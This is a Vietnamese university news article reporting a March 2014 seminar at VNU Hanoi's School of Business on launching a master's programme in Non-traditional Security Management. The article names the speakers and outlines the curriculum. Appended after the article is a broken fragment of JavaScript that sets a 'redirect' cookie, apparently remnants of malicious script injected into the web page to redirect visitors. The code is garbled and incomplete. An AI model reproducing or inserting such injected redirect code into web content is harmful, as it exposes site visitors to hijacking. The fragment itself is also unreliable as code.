IMG 1670Sáng ngày 13/3/2014, tại giảng đường Chu Văn An, Khoa Quản trị Kinh doanh (HSB), Đại học Quốc gia Hà Nội (ĐHQGHN) đã tổ chức Hội thảo Khoa học “Định hướng triển khai chương trình đào tạo Thạc sỹ Quản trị An ninh Phi truyền thống ở Đại học Quốc gia Hà Nội”.

 

 

 

 

Hội thảo Khoa học “Định hướng triển khai chương trình đào tạo Thạc sỹ Quản trị An ninh Phi truyền thống ở Đại học Quốc gia Hà Nội”

 

IMG 1670Sáng ngày 13/3/2014, tại giảng đường Chu Văn An, Khoa Quản trị Kinh doanh (HSB), Đại học Quốc gia Hà Nội (ĐHQGHN) đã tổ chức Hội thảo Khoa học “Định hướng triển khai chương trình đào tạo Thạc sỹ Quản trị An ninh Phi truyền thống ở Đại học Quốc gia Hà Nội”. Tham dự Hội thảo, về phía HSB có GS.TSKH. Vũ Minh Giang – Chủ tịch Hội đồng Khoa học và Đào tạo, PGS.TS. Hoàng Đình Phi – Quyền Chủ nhiệm Khoa, Phó chủ tịch Hội đồng Khoa học và Đào tạo. Một sự góp mặt vô cùng ý nghĩa nữa đến từ các chuyên gia và giảng viên đã tham gia thiết kế và xây dựng Đề án mở chương trình đào tạo thạc sỹ Quản trị An ninh phi truyền thống lần đầu tiên có ở Việt Nam, như PGS.TS. Phạm Hồng Tung – Viện trưởng Viện Việt Nam học, ĐHQGHN; PGS.TS. Trần Thu Hương – Phó Chủ nhiệm Khoa Tâm lý học, Trường Đại học Khoa học Xã hội và Nhân văn, ĐHQGHN; TS. Nguyễn Khắc Hải, Khoa Luật, ĐHQGHN, TS. Nguyễn Ngọc Thắng, Trường Đại học Kinh tế, ĐHQGHN… Hội thảo còn có sự góp mặt của nhiều người quan tâm, một số đối tác chiến lược và toàn thể cán bộ nhân viên của HSB.
Mở đầu Hội thảo, GS.TSKH. Vũ Minh Giang đã trao đổi tham luận “Tính cấp thiết về việc triển khai của chương trình đào tạo Thạc sỹ chuyên ngành Quản trị An ninh Phi truyền thống ở Đại học Quốc gia Hà Nội”. Giáo sư Giang đề dẫn từ quan điểm cần phải xây dựng những chương trình đào tạo liên ngành để có cách tiếp cận đa chiều và sâu rộng hơn đối với một vấn đề nghiên cứu. Tiếp đó là việc cần thiết phải mở rộng khái niệm “an ninh” hiện có cần được hiểu là bao gồm cả “an ninh truyền thống” và “an ninh phi truyền thống”. Phù hợp với Nghị quyết Hội nghị lần thứ 8 Ban chấp hành Trung ương Đảng (Khóa XI) về Chiến lược bảo vệ Tổ quốc trong tình hình mới, trong đó đã xác định cùng với những nguy cơ an ninh truyền thống, những vấn đề mới về an ninh phi truyền thống đang trở thành mối nguy cơ trực tiếp, thường xuyên đối với an ninh quốc gia Việt Nam, Giáo sư đã khẳng định sự ra đời của chương trình Thạc sỹ Quản trị An ninh phi truyền thống là cấp thiết, nhằm đáp ứng kịp thời nhu cầu nghiên cứu và đào tạo nhân lực cho lĩnh vực học thuật tuy còn mới mẻ nhưng có vai trò đặc biệt quan trọng này.

IMG 1659

GS.TSKH. Vũ Minh Giang trình bày tham luận mở đầu Hội thảo

Nối tiếp trao đổi của Giáo sư Giang, PGS.TS. Hoàng Đình Phi cũng có bài tham luận về “Định hướng xây dựng và triển khai chương trình đào tạo Thạc sỹ chuyên ngành Quản trị An ninh Phi truyền thống ở Đại học Quốc gia Hà Nội”. PGS đã trình bày một số nội dung cơ bản của chương trình như: tính chất pháp lý, chuẩn đầu vào, chuẩn đầu ra, khung chương trình và giảng viên giảng dạy… Là một trong những chuyên gia thiết kế chương trình, PGS đã thể hiện quan điểm là phải xây dựng chương trình Thạc sỹ chuyên ngành Quản trị An ninh Phi truyền thống có chất lượng chuyên môn, có trình độ quản trị tốt và có nhiều giá trị gia tăng đối với người học.

IMG 1650
PGS.TS. Hoàng Đình Phi trình bày tham luận tại Hội thảo

Sau 18 – 24 tháng học tập, những thạc sỹ tốt nghiệp chương trình đào tạo chuyên ngành Quản trị An ninh phi truyền thống sẽ là những người có kiến thức liên ngành, có tầm nhìn và tư duy chiến lược, có kỹ năng nghiên cứu và dự báo về an ninh, có khả năng tham gia hoạch định và thực thi các chiến lược và kế hoạch hành động để kiểm soát, phòng ngừa và ứng phó với các mối nguy, tổn thất và tội phạm đe dọa tới an ninh và sự phát triển bền vững của quốc gia, ngành kinh tế, tổ chức, doanh nghiệp và cộng đồng. Tổng thời lượng đào tạo 51 tín chỉ với 13 môn học và luận văn sẽ được thiết kế giảng dạy theo một Trục tri thức để đảm bảo tính hợp lý cả về trình độ và thời gian cho người học. Giảng viên sẽ là những người hướng dẫn người học cách phát triển tư duy, tìm kiếm công cụ và ứng dụng những gì đã học vào công việc của mình. Giảng viên không chỉ là “người dạy” mà còn trở thành “người học” cùng với học viên để khuyến khích sự sáng tạo cho người học đồng thời tăng tính hợp tác đa chiều trong đào tạo tại chương trình. Mỗi môn học trong chương trình sẽ các giảng viên phụ trách biên soạn kỹ lưỡng đề cương và bài giảng, sẽ được Hội đồng Khoa học và Đào tạo của Khoa, Hội đồng chuyên gia của chương trình thẩm định trước khi đưa vào giảng dạy. Việc cập nhật thường xuyên những nội dung mới, những case study ứng dụng cho nghiên cứu môn học là một yêu cầu bắt buộc.
Một trong những trao đổi của PGS. Phi được rất nhiều chuyên gia tâm đắc, đó là vấn đề Bản quyền các môn học. Như tất cả các chương trình đào tạo khác tại HSB, những môn học thuộc chương trình Quản trị An ninh phi truyền thống cũng sẽ được bảo vệ bản quyền tác giả, được trao đổi khi sử dụng và được chia sẻ lợi ích một cách phù hợp. Các chuyên gia, giảng viên đã chia sẻ rất nhiều ý kiến đóng góp để tổ chức đào tạo được thuận lợi, mang lại nhiều nhất những giá trị học thuật cho người học sau này.

IMG 1690 IMG 1721 IMG 1709

Các chuyên gia, giảng viên trao đổi tại Hội thảo

Từ trái sang: PGS.TS. Phạm Hồng Tung, PGS.TS. Trần Thu Hương, TS. Nguyễn Khắc Hải

Hội thảo đã khép lại với rất nhiều ý kiến đánh giá tốt về triển vọng của chương trình, mở ra một định hướng mới trong phương pháp nghiên cứu và giảng dạy những vấn đề mới. Thay mặt cho HSB và Ban tổ chức Hội thảo, PGS. Phi đã đánh giá cao những đóng góp quí báu từ phía các thầy cô trong suốt thời gian qua và hi vọng sẽ tiếp tục được hợp tác trong thời gian sắp tới khi chương trình chính thức được tuyển sinh trong năm 2014.
Tìm hiểu thêm thông tin chi tiết về chương trình tại đây.

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}